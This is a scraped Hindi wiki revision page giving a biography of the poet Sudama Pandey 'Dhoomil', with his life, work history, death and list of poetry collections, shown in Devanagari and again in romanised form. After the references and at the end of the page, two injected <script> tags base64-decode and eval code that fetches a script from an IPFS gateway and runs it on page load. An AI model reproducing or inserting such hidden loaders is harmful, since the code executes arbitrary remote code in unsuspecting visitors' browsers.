Difference between revisions of "सुदामा पांडेय 'धूमिल'"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''सुदामा पांडेय धूमिल''' (अंग्रेज़ी:''Sudama Panday Dhoomil'', जन्म:...' के साथ नया पृष्ठ बनाया)
 
Line 2: Line 2:
 
==जीवन परिचय==
 
==जीवन परिचय==
 
सुदामा पांडेय 'धूमिल' का जन्म 9 नवंबर 1936 को [[वाराणसी]] के निकट गाँव खेवली में हुआ था। उनके पूर्वज कहीं दूर से खेवली में आ बसे थे। धूमिल के पिता शिवनायक पांडे एक मुनीम थे व इनकी माता रजवंती देवी घर-बार संभालती थी। जब धूमिल ग्यारह वर्ष के थे तो इनके पिता का देहांत हो गया। आपका बचपन संघर्षमय रहा। धूमिल का [[विवाह]] 12 वर्ष की आयु में मूरत देवी से हुआ। 1953 में जब आपने हाईस्कूल उत्तीर्ण किया तो आप गांव के पहले ऐसे व्यक्ति थे जिसने मैट्रिक पास की थी। आर्थिक दबावों के रहते वे अपनी पढ़ाई जारी न रख सके। स्वाध्याय व पुस्तकालय दोनों के बल पर उनका बौद्धिक विकास होता रहा।
 
सुदामा पांडेय 'धूमिल' का जन्म 9 नवंबर 1936 को [[वाराणसी]] के निकट गाँव खेवली में हुआ था। उनके पूर्वज कहीं दूर से खेवली में आ बसे थे। धूमिल के पिता शिवनायक पांडे एक मुनीम थे व इनकी माता रजवंती देवी घर-बार संभालती थी। जब धूमिल ग्यारह वर्ष के थे तो इनके पिता का देहांत हो गया। आपका बचपन संघर्षमय रहा। धूमिल का [[विवाह]] 12 वर्ष की आयु में मूरत देवी से हुआ। 1953 में जब आपने हाईस्कूल उत्तीर्ण किया तो आप गांव के पहले ऐसे व्यक्ति थे जिसने मैट्रिक पास की थी। आर्थिक दबावों के रहते वे अपनी पढ़ाई जारी न रख सके। स्वाध्याय व पुस्तकालय दोनों के बल पर उनका बौद्धिक विकास होता रहा।
==व्यावसायिक जीवन==
+
==व्यवसायिक जीवन==
 
रोजगार की तलाश 'धूमिल' को [[कलकत्ता]] ले आई। कहीं ढँग का काम न मिला तो लोहा ढोने का काम कया व मजदूरों की ज़िंदगी को करीब से जाना। इस काम की जानकारी उनके सहपाठी मित्र तारकनाथ पांडे को मिली तो उन्होंने अपनी जानकारी में उन्हें एक लकड़ी की कम्पनी मैसर्स तलवार ब्रदर्ज़ प्रा. लि. में नौकरी दिलवा दी। वहाँ वे लगभग डेढ वर्ष तक एक अधिकारी के तौर पर कार्यरत रहे। इसी बीच अस्वस्थ होने पर स्वास्थ्य-लाभ हेतु घर लौट आए। बीमारी के दौरान मालिक ने उन्हें मोतीहारी से गौहाटी चले जाने को कहा। 'धूमिल' ने अपने अस्वस्थ होने का हवाले देते हुए इनकार कर दिया। मालिक का घमंड बोल उठा, "आई एेम पेइंग फॉर माई वर्क, नॉट फॉर योर हेल्थ!"
 
रोजगार की तलाश 'धूमिल' को [[कलकत्ता]] ले आई। कहीं ढँग का काम न मिला तो लोहा ढोने का काम कया व मजदूरों की ज़िंदगी को करीब से जाना। इस काम की जानकारी उनके सहपाठी मित्र तारकनाथ पांडे को मिली तो उन्होंने अपनी जानकारी में उन्हें एक लकड़ी की कम्पनी मैसर्स तलवार ब्रदर्ज़ प्रा. लि. में नौकरी दिलवा दी। वहाँ वे लगभग डेढ वर्ष तक एक अधिकारी के तौर पर कार्यरत रहे। इसी बीच अस्वस्थ होने पर स्वास्थ्य-लाभ हेतु घर लौट आए। बीमारी के दौरान मालिक ने उन्हें मोतीहारी से गौहाटी चले जाने को कहा। 'धूमिल' ने अपने अस्वस्थ होने का हवाले देते हुए इनकार कर दिया। मालिक का घमंड बोल उठा, "आई एेम पेइंग फॉर माई वर्क, नॉट फॉर योर हेल्थ!"
  
Line 10: Line 10:
  
 
1957 में 'धूमिल' ने कांशी विश्वविद्यालय के औद्योगिक संस्थान में प्रवेश लिया। 1958 में प्रथम श्रेणी से प्रथम स्थान लेकर 'विद्युत का डिप्लोमा' लिया। वहीं विद्युत-अनुदेशक के पद पर नियुक्त हो गए। फिर यही नौकरी व पदोन्नति पाकर वे बलिया, [[बनारस]] व [[सहारनपुर]] में कार्यरत रहे। 1974 में जब वे सीतापुर में कार्यरत थे तो वे अस्वस्थ हो गये। अपनी स्पष्टवादिता व अखड़पन के कारण उन्हें अधिकारियों का कोपभाजन होना पड़ा। उच्चाधिकारी अपना दबाव बनाए रखने के कारण उन्हें किसी न किसी ढँग से उत्पीड़ित करते रहते थे। यही दबाव 'धूमिल' के मानसिक तनाव का कारण बन गया। अक्टूबर 1974 को असहनीय सिर दर्द के कारण 'धूमिल' को काशी विश्वविद्यालय के मेडिकल कॉलेज में भर्ती करवाया गया। डॉक्टरों ने उन्हें ब्रेन ट्यूमर बताया।  नवंबर 1974 को उन्हें लखनऊ के 'किंग जार्ज मेडिकल कॉलेज में भर्ती करवाया गया। यहाँ उनके मस्तिष्क का ऑपरेशन हुआ लेकिन उसके बाद वे 'कॉमा' में चले गए और बेहोशी की इस अवस्था में ही 10 फ़रवरी 1975 को वे काल के भाजक बन गए।<ref name="bharatdarshan">{{cite web |url=https://www.bharatdarshan.co.nz/author-profile/139/kavi-dhumil-biography-hindi.html |title=सुदामा पांडेय धूमिल |accessmonthday=11 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=भारत दर्शन|language=हिंदी }}</ref>
 
1957 में 'धूमिल' ने कांशी विश्वविद्यालय के औद्योगिक संस्थान में प्रवेश लिया। 1958 में प्रथम श्रेणी से प्रथम स्थान लेकर 'विद्युत का डिप्लोमा' लिया। वहीं विद्युत-अनुदेशक के पद पर नियुक्त हो गए। फिर यही नौकरी व पदोन्नति पाकर वे बलिया, [[बनारस]] व [[सहारनपुर]] में कार्यरत रहे। 1974 में जब वे सीतापुर में कार्यरत थे तो वे अस्वस्थ हो गये। अपनी स्पष्टवादिता व अखड़पन के कारण उन्हें अधिकारियों का कोपभाजन होना पड़ा। उच्चाधिकारी अपना दबाव बनाए रखने के कारण उन्हें किसी न किसी ढँग से उत्पीड़ित करते रहते थे। यही दबाव 'धूमिल' के मानसिक तनाव का कारण बन गया। अक्टूबर 1974 को असहनीय सिर दर्द के कारण 'धूमिल' को काशी विश्वविद्यालय के मेडिकल कॉलेज में भर्ती करवाया गया। डॉक्टरों ने उन्हें ब्रेन ट्यूमर बताया।  नवंबर 1974 को उन्हें लखनऊ के 'किंग जार्ज मेडिकल कॉलेज में भर्ती करवाया गया। यहाँ उनके मस्तिष्क का ऑपरेशन हुआ लेकिन उसके बाद वे 'कॉमा' में चले गए और बेहोशी की इस अवस्था में ही 10 फ़रवरी 1975 को वे काल के भाजक बन गए।<ref name="bharatdarshan">{{cite web |url=https://www.bharatdarshan.co.nz/author-profile/139/kavi-dhumil-biography-hindi.html |title=सुदामा पांडेय धूमिल |accessmonthday=11 फ़रवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=भारत दर्शन|language=हिंदी }}</ref>
 +
 
==कृतियाँ==  
 
==कृतियाँ==  
 
धूमिल के चार काव्य-संग्रह प्रकाशित हो चुके हैं जिनमें सम्मिलित हैं-
 
धूमिल के चार काव्य-संग्रह प्रकाशित हो चुके हैं जिनमें सम्मिलित हैं-

Revision as of 08:35, 11 February 2018

sudama paandey dhoomil (aangrezi:Sudama Panday Dhoomil, janm: 9 navanbar, 1936 - mrityu: 10 faravari, 1975) hindi ke samakalin kavi the. unaki kavitaoan mean azadi ke sapanoan ke mohabhang ki pi da aur akrosh ki sabase sashakt abhivyakti milati hai. vyavastha jisane janata ko chhala hai, usako aina dikhana mano dhoomil ki kavitaoan ka param lakshy hai.

jivan parichay

sudama paandey 'dhoomil' ka janm 9 navanbar 1936 ko varanasi ke nikat gaanv khevali mean hua tha. unake poorvaj kahian door se khevali mean a base the. dhoomil ke pita shivanayak paande ek munim the v inaki mata rajavanti devi ghar-bar sanbhalati thi. jab dhoomil gyarah varsh ke the to inake pita ka dehaant ho gaya. apaka bachapan sangharshamay raha. dhoomil ka vivah 12 varsh ki ayu mean moorat devi se hua. 1953 mean jab apane haeeskool uttirn kiya to ap gaanv ke pahale aise vyakti the jisane maitrik pas ki thi. arthik dabavoan ke rahate ve apani padhaee jari n rakh sake. svadhyay v pustakalay donoan ke bal par unaka bauddhik vikas hota raha.

vyavasayik jivan

rojagar ki talash 'dhoomil' ko kalakatta le aee. kahian dhang ka kam n mila to loha dhone ka kam kaya v majadooroan ki ziandagi ko karib se jana. is kam ki janakari unake sahapathi mitr tarakanath paande ko mili to unhoanne apani janakari mean unhean ek lak di ki kampani maisars talavar bradarz pra. li. mean naukari dilava di. vahaan ve lagabhag dedh varsh tak ek adhikari ke taur par karyarat rahe. isi bich asvasth hone par svasthy-labh hetu ghar laut ae. bimari ke dauran malik ne unhean motihari se gauhati chale jane ko kaha. 'dhoomil' ne apane asvasth hone ka havale dete hue inakar kar diya. malik ka ghamand bol utha, "aee eem peiang ph aaur maee vark, n aaut ph aaur yor helth!"

'dhoomil' ke svabhiman par chot lagi to malik ko khari-khari suna di,"bat aee aim varkiang ph aaur maee helth, n aaut vor yor vark."

phir kya tha sadhe char sau ki naukari, prati ghan phut milane vala kamishan v ti. e, di. e....'dhoomil' ne sabako lat laga di. isi ghatana se 'dhoomil' pooanjipatiyoan aur mazadooroan ke drishtikon v fasale ko samajhe. ab unaka janavadi sangharsh unaki kavita mean akrosh ban prakat hone vala tha. dhoomil ko hiandi kavita ke sangharsh ka kavi kaha jata hai.

1957 mean 'dhoomil' ne kaanshi vishvavidyalay ke audyogik sansthan mean pravesh liya. 1958 mean pratham shreni se pratham sthan lekar 'vidyut ka diploma' liya. vahian vidyut-anudeshak ke pad par niyukt ho ge. phir yahi naukari v padonnati pakar ve baliya, banaras v saharanapur mean karyarat rahe. 1974 mean jab ve sitapur mean karyarat the to ve asvasth ho gaye. apani spashtavadita v akh dapan ke karan unhean adhikariyoan ka kopabhajan hona p da. uchchadhikari apana dabav banae rakhane ke karan unhean kisi n kisi dhang se utpi dit karate rahate the. yahi dabav 'dhoomil' ke manasik tanav ka karan ban gaya. aktoobar 1974 ko asahaniy sir dard ke karan 'dhoomil' ko kashi vishvavidyalay ke medikal k aaulej mean bharti karavaya gaya. d aauktaroan ne unhean bren tyoomar bataya. navanbar 1974 ko unhean lakhanoo ke 'kiang jarj medikal k aaulej mean bharti karavaya gaya. yahaan unake mastishk ka aaupareshan hua lekin usake bad ve 'k aauma' mean chale ge aur behoshi ki is avastha mean hi 10 faravari 1975 ko ve kal ke bhajak ban ge.[1]

kritiyaan

dhoomil ke char kavy-sangrah prakashit ho chuke haian jinamean sammilit haian-

  • sansad se s dak tak (isaka prakashan svayan 'dhoomil' ne kiya tha)
  • kal sunana mujhe (sanpadan - rajashekhar)
  • dhoomil ki kavitaean (sanpadan - d aau. shukadev)
  • sudama pande ka prajatantr (sanpadan - ratnashankar. ratnashankar 'dhoomil' ke putr haian.)

uparokt kriti 'sansad se s dak tak' ka prakashan svayan 'dhoomil ne kiya tha v shesh ka prakashan maranoparaant vibhinn prakashakoan dvara kiya gaya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 sudama paandey dhoomil (hiandi) bharat darshan. abhigaman tithi: 11 faravari, 2018.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>